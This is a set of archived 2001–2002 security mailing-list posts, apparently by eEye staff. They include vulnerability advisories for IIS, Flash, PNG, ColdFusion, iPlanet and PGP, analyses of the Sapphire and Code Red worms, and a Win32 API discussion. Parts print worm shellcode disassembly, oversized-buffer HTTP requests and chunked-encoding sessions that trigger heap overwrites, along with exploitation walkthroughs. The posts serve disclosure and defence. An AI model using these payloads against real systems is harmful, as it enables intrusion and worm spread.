It should be noted that this worm is not the same as an earlier SQL worm
that used the SA/nopassword SQL vulnerability as its  spread vector. This is
a new worm is more devastating as it is taking advantage of a
software-specific flaw rather than a  configuration error. We have already
had many reports of smaller networks brought down due to the flood of data
from the  Sapphire Worm trying to re-infect new systems.

Corrective Action
We recommend that people immediately firewall SQL service ports at all of
their gateways. The worm uses only UDP port 1434  (SQL Monitor Port) to
spread itself to a new system; however, it is safe practice to filter all
SQL traffic at all gateways.  The following is a list of SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor

Once again this worm is taking advantage of a known vulnerability that has
had a patch available for many months. Microsoft  has also released a recent
service pack for SQL (Service Pack 3) that includes a fix for this

Standalone patch:

SQL 2000 Service Pack 3:

Previous SQL Service Pack versions are vulnerable.

Technical Description

The following is a quick run-down of what the worm's payload is doing after
1. Retrieves the address of GetProcAddress and Loadlibrary from the IAT in
sqlsort.dll. It snags the necessary library base  addresses and function
entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address  that will later be
used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random

push42B0C9DCh   ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h   ; Reconstruct session, after the
overflow the payload buffer
; get's corrupted during program
execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h

xor eax, 5010101h
mov ebp, esp
push6E72656Bh   ; kernel32
push746E756Fh   ; GetTickCount
mov cx, 6C6Ch
push642E3233h   ; ws2_32.dll
mov cx, 7465h
push6B636F73h   ; socket
mov cx, 6F74h
push646E6573h   ; sendto
mov esi, 42AE1018h  ; IAT from sqlsort
lea eax, [ebp-2Ch]  ; (ws2_32.dll)
calldword ptr [esi] ; call loadlibrary
lea eax, [ebp-20h]
lea eax, [ebp-10h]  ; (kernel32.dll)
calldword ptr [esi] ;

Macromedia Shockwave Flash Malformed Header Overflow #2

2002-12-17 Thread Marc Maiffret
Macromedia Shockwave Flash Malformed Header Overflow #2

Release Date:
December 16, 2002

High (Remote Code Execution)

Systems Affected:
Macromedia Flash Player versions less than

While working on some pre-release Retina® CHAM tools, multiple exploitable
conditions were discovered within the Shockwave Flash file format SWF
(pronounced "SWIF").

There exists a vulnerability within Macromedia's Flash software and its
handling of malformed Flash files. Attackers can use this vulnerability to
compromise users of Macromedia's Flash software. A corrupt file may be
placed on a website or in some cases within an HTML email.

We provided Macromedia with various corrupt Flash files, a few of which we
verified for exploitability. Macromedia has since fixed the exploitable
conditions as well as various other bugs that were found.

The primary danger of exploiting Macromedia Flash is its extensive user base
and portability across operating systems. Further, it is "version frozen" on
operating system installation set-ups, so issues may linger for sometime.
Regardless, Macromedia has fixed all of the known issues.

Technical Description:
The data header is roughly made out as:

[Flash Signature][version (1)][File Length(a number of bytes too
short)][Frame Size (malformed)][Frame Rate (malformed)][Frame Count

While the diagram may remain the same for this issue as in the previous
issue (, there
are variations in the malformed data which are very specific to this issue.
In this case, EBP is completely controlled, so exploitation is
straight-forward. EDI is also directly controlled as well as EDX and EDI
which all give attackers the ability to easily exploit the vulnerable

Retina® Network Security Scanner ( has been
updated to identify this latest Macromedia Flash vulnerability.

Vendor Status:
Macromedia has been notified and released a patch for this vulnerability,
available at:

Drew Copley, Research Engineer, eEye Digital Security

StoneFisk, the Shrug, Zonetripper, Die Liu Yu, Dror Shalev, Malware.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

PNG (Portable Network Graphics) Deflate Heap Corruption Vulnerability

2002-12-12 Thread Marc Maiffret
PNG (Portable Network Graphics) Deflate Heap Corruption Vulnerability

Release Date:
December 11, 2002

High (Code Execution)

Systems Affected:
We have specifically tested the following software and verified the
potential for exploitation:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0

Note: We have also successfully exploited this vulnerability via the IE web
control for Microsoft Outlook.

For the purpose of completeness we have included a listing of each product
that ships with the vulnerable pngfilt.dll version 6.0.2600.0 and prior. We
obtained this list from Microsoft’s DLL Help Database:

Access 2000 SR1
BackOffice 4.5
Commerce Server 2000
DirectX 6.0 SDK
DirectX 6.0 SDK
Internet Explorer 4.0
Internet Explorer 4.01 SP1
Internet Explorer 4.01 SP1
Internet Explorer 4.01 SP2
Internet Explorer 4.01 SP2
Internet Explorer 5.0
Internet Explorer 5.01
Internet Explorer 5.5
Internet Explorer 5.5 Service Pack 2
Internet Explorer 6.0
Microsoft Visual Studio .NET (2002) Enterprise Architect
Microsoft Visual Studio .NET (2002) Enterprise Architect
Microsoft Visual Studio .NET (2002) Enterprise Developer
Microsoft Visual Studio .NET (2002) Professional
Office 2000 Developer
Office 2000 SR1
Office 2000 SR1
Office XP Professional
Project 2002 Professional
Publisher 98
Publisher 98
SNA Server 4.0 SP2
SNA Server 4.0 SP2
SNA Server 4.0 SP3
SNA Server 4.0 SP3
SQL Server 7.0
SQL Server 7.0
SharePoint Portal Server
Small Business Server 2000
Small Business Server 2000
Visio 2002 Professional
Visio 2002 Standard
Visual Basic .NET Standard 2002
Visual C# .NET Standard 2002
Visual C++ .NET Standard 2002
Visual FoxPro 7.0
Visual Studio 6.0
Visual Studio 6.0
Visual Studio 6.0 SP4
Visual Studio 6.0 SP5
Windows 2000 Datacenter Server
Windows 2000 Professional
Windows 2000 Server
Windows 95 OSR 2.5
Windows 95 OSR 2.5
Windows 98
Windows 98 Second Edition
Windows Millenium Edition
Windows NT 4.0 SP5
Windows NT 4.0 SP5
Windows XP Home 2002
Windows XP Professional 2002

Twas the night before Christmas, and deep in IE
A creature was stirring, a vulnerability
MS02-066 was posted on the website with care
In hopes that Team eEye would not see it there

But the engineers weren't nestled all snug in their beds,
No, PNG images danced in their heads
And Riley at his computer, with Drew's and my backing
Had just settled down for a little PNG cracking

When rendering an image, we saw IE shatter
And with just a glance we knew what was the matter
Away into SoftICE we flew in a flash
Tore open the core dumps, and threw RFC 1951 in the trash

The bug in the thick of the poorly-written code
Caused an AV exception when the image tried to load
Then what in our wondering eyes should we see
But our data overwriting all of heap memory

With heap management structures all hijacked so quick
We knew in a moment we could exploit this $#!%
More rapid than eagles our malicious pic came --
The hardest part of this exploit was choosing its name

Derek Soeder
Software Engineer
eEye Digital Security

During a review of the PNG image format implemented in Microsoft Windows,
two separate vulnerabilities were discovered related to the interpretation
of PNG image data. The first vulnerability deals with the handling of the
IDAT header and does not appear to be of significant threat level. The
second vulnerability can be exploited to execute code when the malicious PNG
image is viewed.  Due to the complexity of each of these vulnerabilities we
have decided only to describe the latter in detail.

General Description:
A heap corruption vulnerability exists due to the way the function
inflate_fast(), within pngfilt.dll, handles certain invalid data present in
“deflate” data input streams in a PNG image file.  The “deflate” compression
specification allows for the repetition of patterns that occur in the
decompressed data. This is accomplished by specifying a pair of special
codes that tell the decompression routine how far back into the decompressed
stream the pattern occurred (distance code), and the length of the pattern
to repeat in bytes (length code).  The inflate_fast() routine does not
properly handle length codes marked in the specification as invalid, and as
a result, a pattern can be replicated over a large portion of the heap,
allowing a skilled attacker to redirect the execution of a thread into a
“deflated” payload embedded in the deflate datastream within the malicious
PNG image.

Technical Description:
The heap overflow described above occurs in the interpretation of a
compressed block that uses fixed Huffman codes (BTYPE = 1).  Length codes
#286 and #287, while labeled as invalid in the formal specification (RFC
1951), are not discarded by the inflation routine, and are instead treated
as zero-length codes.  However, due to the way the inflation routine is
designed (see below), the length counter is decremented prior to being
evaluated, and an integer overflow will occur.  As a re

EEYE: Macromedia ColdFusion/JRun Remote SYSTEM Buffer Overflow Vulnerabilities

2002-11-12 Thread Marc Maiffret
Macromedia ColdFusion/JRun Remote SYSTEM Buffer Overflow Vulnerabilities

Release Date:
November 12, 2002

High (Remote SYSTEM level code execution)

Systems Affected:
Macromedia Coldfusion 6.0 and prior (IIS ISAPI)
Macromedia JRun 4.0 and prior (IIS ISAPI)

Macromedia JRun and ColdFusion IIS ISAPI handlers contain various heap
overflows when handling URI filenames. By supplying a filename over 4096
bytes in size, heap memory can be overwritten. Various structures can be
overwritten in the process heap to gain control of the remote IIS process
with SYSTEM level access. This makes it rather trivial for attackers to
remotely compromise Microsoft IIS web servers running vulnerable versions of
Macromedia Coldfusion or JRun.

The following requests can be used to duplicate the attack.

For JRun:
telnet 80
GET /[+4096 byte buffer].jsp HTTP/1.0

For Coldfusion:
telnet 80
GET /[+4096 byte buffer].cfm HTTP/1.0

During testing, 5000 bytes was sufficient to begin overwriting data
structures that made exploitation straightforward. The vulnerabilities exist
in error handling within the ISAPI filters.

eEye Digital Security customers using SecureIIS are protected from the
exploitation of this vulnerability.

Vendor Status:
Macromedia has released patches for both the JRun and Coldfusion products.
ColdFusion MX Advisory:
JRun Advisory:

Credit: Riley Hassell, Research Engineer - eEye Digital Security

Greetings: Eli, Kasia, Jenn, Hx2, and the all the crazy kiwi's with hackfu

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

RE: White paper: Exploiting the Win32 API.

2002-08-10 Thread Marc Maiffret

I am aware of a Microsoft application that has made such a mistake. is an example
of one. In fact you would be surprised at the number of services vulnerable
to these types of attacks. From personal firewalls, to anti-virus and so on.

priv. escalation through windows message attacks is nothing new. back when i
was in rhino9, 4 or so years ago, we were performing similar attacks to do
priv. escalation from IUSR to SYSTEM.

out of box the way windows messaging works i think is flawed... yes there
are things you can do to protect from most of these attacks. however windows
should install out of box with these attacks in mind... secure by default
and all that jazz ;-) there is a lot that can be done at the OS level to
protect from programmers who do not know any better.

I know Microsoft keeps saying they will be secure by default... however I
doubt we will see that anytime soon. especially for lower level stuff like

Besides... its next to impossible to keep a local user from getting SYSTEM.
There are just to many ways to do it. From service exploitation, to windows
api's, to core flaws within windows architecture.

any OS where locally you can input a chunk of data to some graphic routines,
as an unprivileged user, and then b00m be executing code within the
kernel... you cant trust that OS for local privilege separation of users and
such. makes you wonder if you can even trust it in remote scenarios. :-o

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

-Original Message-
From: John Howie [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, August 06, 2002 10:44 AM
To: Chris Paget; [EMAIL PROTECTED]
Subject: RE: White paper: Exploiting the Win32 API.


This class of attack is not new, it has been discussed before. While you
can assert that the blame lies with Microsoft (and I'll admit they do
have some responsibility to address the problem you describe) the chief
blame lies with the vendor of the software whose bad programming you are
exploiting. There is no excuse to put a window for a process with the
LocalSystem security context on a user's desktop. I am not aware of any
Microsoft application that makes such a mistake.

John Howie

-Original Message-
From: Chris Paget [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, August 06, 2002 9:14 AM
Subject: White paper: Exploiting the Win32 API.

I have written a white paper documenting what I believe is the first
public example of a new class of attacks against the Win32 API.  This
particular attack exploits major design flaws in the Win32 API in
order for a local user to escalate their privileges, either from the
console of a system or on a Terminal Services link.  The paper is
available at

In order to pre-empt some of the inevitable storm about responsible
disclosure, let me point out the following.

1)  The Win32 API has been in existence since the days of Windows
NT3.1, back in July 1993.  These vulnerabilities have been present
since then.

2)  Microsoft have known about these vulnerabilities for some time.
This research was sparked by comments by Jim Allchin talking under
oath at the Microsoft / DoJ trial some 3 months ago.,3959,5264,00.asp  Given the age of the
Win32 API, I would be highly surprised if they have not known about
these attacks for considerably longer.

3)  Microsoft cannot fix these vulnerabilities.  These are inherent
flaws in the design and operation of the Win32 API.  This is not a bug
that can be fixed with a patch.

4)  The white paper documents one example of these class of flaws.
They have been discussed before on Bugtraq, however to my knowledge
there have been no public working exploits.  I have just documented
one way to get this thing working.

5)  This is not a bug.  This is a new class of vulnerabilities, like a
buffer overflow attack or a format string attack.  As such, there is
no specific vendor to inform, since it affects every software maker
who writes products for the Windows platform.  A co-ordinated release
with every software vendor on the planet is impossible.


Chris Paget

EEYE: Sun(TM) ONE / iPlanet Web Server 4.1 and 6.0 Remote Buffer Overflow

2002-08-09 Thread Marc Maiffret

Sun(TM) ONE / iPlanet Web Server 4.1 and 6.0 Remote Buffer Overflow

Release Date: August 8, 2002

High (Remote SYSTEM/ROOT)

Systems Affected:
iPlanet 6.0 and prior

A vulnerability in transfer chunking can be exploited to remotely execute
code of an attacker's choice on a vulnerable machine. By sending a carefully
crafted session, an attacker can overwrite a section of the heap. Various
data structures in the overwritten heap can be manipulated to move attacker
supplied data to attacker supplied memory addresses, thereby altering the
flow of execution into an attacker supplied payload.

Note this variant is not the integer overflow affecting IIS and Apache that
was discovered during regression testing with Microsoft. This is another
variant relating to incorrect size calculation.

The following example will show the vulnerable condition:

**Begin Session
POST /EEYE.html HTTP/1.1
Transfer-Encoding: chunked
Content-Length: 22

**End Session**

[DATA] will overwrite heap memory. Increase or decrease depending on

Technical Description:
The example session above overwrites a section of the heap that contains
data structures related to the Memory management system. By manipulating the
content of these structures, we can overwrite an arbitrary 4 bytes of memory
with an attacker supplied address.

It is widely assumed that the risk for these type of vulnerabilities is
fairly low due to the fact that addressing is dynamic and that you must use
brute force in your attack; however, this is false assumption and
exploitation can be successful with one attempt, across dll versions. An
attacker can overwrite static global variables, stored function pointers,
process management structures, memory management structures, or any number
of data types that will allow him to gain control of the target application
in one session.

Vendor Status:
Sun has released a security bulletin and patch:

Credit: Riley Hassell

Eli, Kasia, Halvar, FX, and the three amigos K2, Dark Spyrit, and Joey.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

EEYE: Macromedia Shockwave Flash Malformed Header Overflow

2002-08-09 Thread Marc Maiffret

Macromedia Shockwave Flash Malformed Header Overflow

Release Date: August 8, 2002

High (Remote Code Execution)

Systems Affected:
Macromedia Shockwave Flash - All Versions;
Unix and Windows; Netscape and Internet Explorer

While working on some pre-release eEye Retina CHAM tools, an exploitable
condition was discovered within the Shockwave Flash file format called SWF
(pronounced "SWIF").

Since this is a browser based bug, it makes it trivial to bypass firewalls
and attack the user at his desktop. Also, application browser bugs allow you
to target users based on the websites they visit, the newsgroups they read,
or the mailing lists they frequent. It is a "one button" push attack, and
using anonymous remailers or proxies for these attacks is possible.

This vulnerability has been proven to work with all versions of Macromedia
Flash on Windows and Unix, through IE and Netscape. It may be run wherever
Shockwave files may be displayed or attached, including: websites, email,
news postings, forums, Instant Messengers, and within applications utilizing
web-browsing functionality.

Technical Description:
The data header is roughly made out to:

[Flash signature][version (1)][File Length(A number of bytes too
short)][frame size (malformed)][Frame Rate (malformed)][Frame Count

By creating a malformed header we can supply more frame data than the
decoder is expecting. By supplying enough data we can overwrite a function
pointer address and redirect the flow of control to a specified location as
soon as this address is used. At the moment the overwritten address takes
control flow, an address pointing to a portion of our data is 8 bytes back
from the stack pointer. By using a relative jump we redirect flow into a
"call dword ptr [esp+N]", where N is the number of bytes from the stack
pointer. These "jump points" can be located in multiple loaded dll's. By
creating a simple tool using the debugging API and ReadMemory, you can
examine a process's virtual address space for useful data to help you with
your exploitation.

This is not to say other potentially vulnerable situations have not been
found in Macromedia's Flash. We discovered about seventeen others before we
ended our testing. We are working with Macromedia on these issues.

Retina(R) Network Security Scanner already scans for this latest version of
Flash on users' systems. Ensure all users within your control upgrade their

Vendor Status:
Macromedia has released a patch for this vulnerability, available at:

Discovery: Drew Copley
Exploitation: Riley Hassell

Greetings: Hacktivismo!, Centra Spike

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

EEYE: Remote PGP Outlook Encryption Plug-in Vulnerability

2002-07-10 Thread Marc Maiffret

Remote PGP Outlook Encryption Plug-in Vulnerability

Release Date:
July 10, 2002

High (Remote Code Execution)

Systems Affected:
NAI PGP Desktop Security 7.0.4
NAI PGP Personal Security 7.0.3
NAI PGP Freeware 7.0.3


The beer is still cold, the days are still long, the exploits still start as
jokes (this time over a beer with a three letter agency) and the
advisories... we'll just say, "All of your SCADA are belong to us."

A vulnerability in the NAI PGP Outlook plug-in can be exploited to remotely
execute code on any system that uses the NAI PGP Outlook plug-in’s. By
sending a carefully crafted email the message decoding functionality can be
manipulated to overwrite various heap structures pertinent to the PGP

This vulnerability can be exploited by a user simply selecting a “malicious”
email, the opening of attachments is not required. When the attack is
performed against a target system, malicious code will be executed within
the context of the user receiving the email. This can lead to the compromise
of the targets machine, as well as their PGP encrypted communications. It
should also be noted that because of the nature of the SMTP protocol this
vulnerability can be exploited anonymously.

Technical Description:


By creating a malformed email we can overwrite a section of heap memory that
contains various data. By overwriting this section of heap with valid
addresses of an unused section in the PEB, which is the same across all NT
systems, we can walk the email parsing and eventually get to something
easily exploitable:


This pointer addresses references a function pointer list. At the time of
exploitation, an attacker controlled buffer address is the first item on the
stack. By overwriting the function pointer list pointer address with the
address of an Import table, we can call any imported function. Our current
stack will be passed into the function for parameter use. as is. The first
item on our stack is an address that points to attacker-controlled data.

By overwriting the address, with the address of the
SetUnhandledExceptionFilter() IAT entry, execution will redirect into this
address when the default exception handler is called,

After returning from SetUnhandledExceptionFilter() PGP Outlook will fail as
it crawls back down the call stack, after cycling through the exception list
it will call the DefaultExceptionFilter, which now contains the address of
our code. This of course can also be exploited silently using frame

Due to the large size of an example vulnerable email we are not including it
in our advisory. We will be updating the research section of our website
with a link to an example email.

Where do you want your secret key to go today?

Vendor Status: NAI has worked quickly to safeguard customers against this
vulnerability. They have released a patch, for the latest versions of the
PGP Outlook plug-in, to protect systems from this flaw. You may download the
patch from:
Note: This issue does not affect PGP Corporate Desktop users.

Discover: Marc Maiffret
Exploitation: Riley Hassell

Greetings: Kasia, and the hot photographer from Inc Magazine. Phil
Zimmerman, the godfather of personal privacy, much respect.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

Macromedia Flash Activex Buffer overflow

2002-05-02 Thread Marc Maiffret

Macromedia Flash Activex Buffer overflow

Release Date:

High (Remote code execution)

Systems Affected:
Flash Activex Ocx Version 6, revision 23
(Possibly older versions)

This is an unusual advisory in a number of ways.

One, it was found while investigating an access error encountered during
normal web surfing, which was suspicious. Within a few hours we had
confirmed on multiple Operating Systems that this was an exploitable
condition that overwrote EIP.

Two, while we tested on these systems with the latest install from the
vendor's site, when we contacted the vendor they informed us that they had
just released a new build this same day which already fixed the problem.
They asked us to confirm this. We tried the link they gave us and it did
indeed fix the problem and was a new build. Testing the link later that
night confirmed the link we used to install the ocx now had the fixed,
latest version.

In this, we congratulate Macromedia for: finding the bug, fixing it, and
releasing the build in a timely fashion. This truly shows that they are
dedicated to security just as they have stated they are.

However, because there is a signed flash ocx out there which has been
downloaded by an untold number of people, and potentially could still be
used in an exploit scenario against those without the latest ocx we felt the
need to release this advisory.

Furthermore, this issue was found in the wild, and it is not safe to assume
it could not be found by others with malicious intent. Nor do we believe it
is safe to assume this has not been found by users with malicious intent.

There are further issues with old activex objects which have such
vulnerabilities which will be discussed in the description section.


A vulnerability in the parameter handling to the Flash OCX, which could lead
to the execution of attacker supplied code via email, web or any other
avenue in which Internet Explorer is used to display html that an attacker
can supply. This includes software which uses the web browser activex.

All users of Internet Explorer are potentially affected because this is a
Macromedia signed ocx. We advise them to upgrade their flash version
immediately to version 6, revision 29.

Example:[...unstated, but
fixed number]">

Where X overwrites the EIP consistently across Windows platforms.

Technical Description:

Flash.ocx is an activex object installed with Internet Explorer, and is used
to display flash objects on the web.

Proper bounds checking is not in place in the "movie" parameter which
overwrites EIP at an unsaid, but fixed number of bytes across Windows

Because the ocx is signed by Macromedia: there is a chance the older activex
could be used against people without flash; people whom have an older
version of flash not affected may be forced to "upgrade" to the affected
version; and, of course, those with the affected versions need to upgrade
lest the exploit works out of the box on them.

There has been considerable debate about legacy activex objects which have
exploits within them. In general, if someone uses the codebase parameter to
point to an affected version of the activex, the system will first try and
grab the activex from Microsoft's activex store on the web. Then, it will
try the activex specified in the codebase tag by the malicious user.

We do not believe this method is full proof.

We do not believe the method is full proof because of the potential of the
activex storehouse check failing and because of the potentiality for the
activex to be called by other methods. (At least a few potential other
methods are in the RFC for applets and objects).

However, the other option of setting the "kill bit" for the affected activex
and reassigning the fixed activex version with a new classid is only a
suggestion we will make in this case. We do not believe it is necessarily

Risk should be mitigated to a satisfactory level by users upgrading to the
new ocx.

Vendor Status:
Visit Macromedia's site to get the latest Flash ocx to eliminate these

Credit: Drew Copley

Greetings: Fat code: presented by Yahoo and Weight Watchers. KROQ, and corn
dog manufacturers world wide.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever ar

Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

2002-04-10 Thread Marc Maiffret

Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

Release Date:

High (Remote code execution)
IWAM_MACHINE Privilege Level

Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0


A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by
default on all NT4 and Windows 2000 server systems (running IIS), can be
exploited to remotely execute code of an attackers choice. The fault lies
within the decoding and interpretation of form data received by malicious
clients. By chunk encoding form data we can force IIS to overwrite 4 bytes
of arbitrary memory with data we supply.

This is a very serious vulnerability and eEye suggests that administrators
install the Microsoft supplied patch as soon as possible.

The following example will show the vulnerable condition.  We will use a
default .asp page left after install on a Windows 2000 server with the
latest service packs.


**Begin Session
POST /iisstart.asp HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

**End Session**

Technical Description:

The example session above causes the default exception handler to execute
from within the dllhost child process.  When the default exception handler
executes a window will open with this message:

DLLHOST.EXE - Application error
The instruction at 0x77fcb397 referenced memory at 0x54534544

Notice that 0x54534544 is the hex representation of "TSED", or the value
"DEST" in little endian format. The DLLHOST.EXE process is trying to copy
"DATA" to "DEST". Because there isn't writeable memory at 0x54534544, an
access violation occurs and the structured exception handling (SEH) within
the NT kernel catches it and kills the child dllhost.exe process.

The crux of this problem lies in the fact that the memory we overwrite with
our data contains Heap Management header structures, in our case being used
by AllocateHeap(). Specifically, as we overwrote the header, we control two
four byte addresses within it. These addresses are associated with the
population and use of lookaside lists. The first four-byte address, which in
our example is overwritten by "DATA", is an address that gets copied to the
second four-byte address specified in header.  We have also overwritten the
second address, this time with "DEST". By overwriting these two addresses,
we can put four bytes anywhere in memory that the child dllhost.exe has
privileges to write to.  This allows us to overwrite function pointers,
saved instruction pointers, exception handlers, or anything else that will
allow us to control the flow of execution into our payload. We have been
most successful in exploitation by overwriting a structured exception
handler address on the stack.  Due to the fact that we supplied addresses
that aren't associated with valid lookaside lists, an exception handler will
be called, and when it does, it will call our modified routine, which points
directly into payload code.

It should be noted that while this vulnerability exists in the .ASP ISAPI, a
mechanism is still required to get the malicious request to hit the
vulnerable functions within the .ASP ISAPI. Although pages with form
submissions make it easier to demonstrate this vulnerability, there are
other methods for causing  code to execute beyond the form variable
referencing. In the above example we used a default .asp file that has
script code within it that deals with .ASP Server Variables. When the .ASP
ISAPI performs processing on the Server Variables, we are able to cause an
overflow and execute code. There are .asp files by default in IIS that allow
processing of Server Variables, which make it possible to demonstrate the
existence of this vulnerability on default installations.

Like most of the IIS vulnerabilities eEye has discovered in the past,
firewalls and intrusion detection systems do not protect from this

SecureIIS - Application Firewall for Microsoft IIS

It should be noted that clients using SecureIIS 1.2.5 and above are secure
from this vulnerability. This vulnerability was discovered by the eEye team
while testing a new version of SecureIIS to help further its protection
abilities. To learn more visit

Vendor Status:
Microsoft has released a security bulletin and patch:

Discovery: Riley Hassell
Exploitation Research: Riley Hassell and Ryan Permeh

To all the people who continue to make the security industry more exciting
with innovative research. Also to the rest of eEye, who help make all this
magic possible.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It

Tool released to scan for possible CodeRed infected servers

2001-07-20 Thread Marc Maiffret

In an effort to help administrators find all systems within their network
that are vulnerable to the .ida buffer overflow attack, which the "Code Red"
worm is using to spread itself, we have decided to release a free tool named
CodeRed Scanner. It can scan a range of IP addresses and report back any IP
addresses which are vulnerable to the .ida attack, and susceptible to the
"Code Red" worm.

The program will allow you to either scan a single IP address or a Class C
(254) set of IP addresses. It will output a list of IP addresses which can
be double clicked on to get information on how to patch your system from the
.ida vulnerability and to eradicate the "Code Red" worm from your system.
Also this is a program you get to install on your own computer so you do not
have to go to a website and register to scan 1 IP address at a time etc...
like some of the other scanners we have seen that scan for the CodeRed Worm.

We are able to remotely scan IP addresses (web servers) for the .ida
vulnerability (CodeRed Worm) without having to test your system via a buffer
overflow, which can bring your web server down. Instead we use a technique
which we have taken from Retina that allows CodeRed Scanner the ability to
test a web server remotely, without causing any harm to it. This allows us
to see if the .ida patch is installed or not (if the server is infected or
susceptible to infection).

To download CodeRed Scanner go to:

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

CodeRed: the next generation

2001-07-20 Thread Marc Maiffret

The following is a description of a "variant" "Code Red" worm that we have
found to be in the wild. Sorry for the rough content but we thought it would
be best to get this information out sooner and worry about pretty text
formating later ;-]

In this text, we will be refering to the original "Code Red" worm as CRv1
and the second generation "Code Red" worm as CRv2.  This does not preclude
further generations/varioations still in the wild, it is just an analysis of
the worms we have access to.

This information is not currently public. Well, sort of is (we published the
disassembly of CRv1, so CRv1 targeting info may be known), but the existance
of CRv2 with different targeting has not been verified until now as far as
we know. For the evidence surrounding the impetus for this second worm
search, please examine Stuart Staniford's ([EMAIL PROTECTED])
excellent statistical analysis of worm hit data.

The CRv2 worm has the following charecteristics:
second:milisecond randomness added to ip selection process removal of web
page hack display (no notice to the end users via a defaced page)

All other parts of the worm are the same. (still attacks (but
the IP address has been blackholed), has time limits/definitions of attack,
notworm lysine)

The worst part about this means that our original tracking methodology
(sensors early in the sequence) is no longer accurate, since CRv2 infected
hosts do not contact early hosts, nor reliably contact any point (other than
the blackholed IP address that use to point to  This means
that potentially ALL(ie: global, coprehensive) ids/logs data must be
organized and sorted to find infected hosts.

The Differences:
It has 13 or so pertient bytes changed, adding a time based randomness
factor and disabling page defacement.  The code had been there all along. It
had intentially (we must assume) been disabled in CRv1 , then reenabled near
the end of the cycle.  There has been discussion that this was a natural
progression of the worm code, however, we do not beleive this is the
case.  From analsysis of CRv1, there seems to be no distinct way to shift
the nessecary bytes to generate CRv2. Hence, it is my belief that this is a
modified worm, rereleased.  It has been posited that the CRv1 was a target
aqusition mechanism, gathering data on infectable hosts to gain a high
initital base for the following CRv2 infection.

The Ip Selection Process:
We will display the effecive CRv1(sequence), and the effective
CRv2(timebased) ip selection processes.  This is a one byte change, at
offset 9C2.  it changes the storage of some time based computations that
were performed in CRv1 but discarded. The new byte changes the storage
location from EBP-1B0( a general purpose holder stack var) to EBP - 18C(the
location of the ip).  This means that the timevars are actively used in
CRv2, while being discarded in CRv1.

These are the targeting algorithms(complete, as far as we can discern) that
are the asm in the CRv1 worm and also in the CRv2  worm.

Seeding the "PRNG" for these examples seed is used for ip through the first
iteration of the connect loop.  the seed does not change between CRv1 and
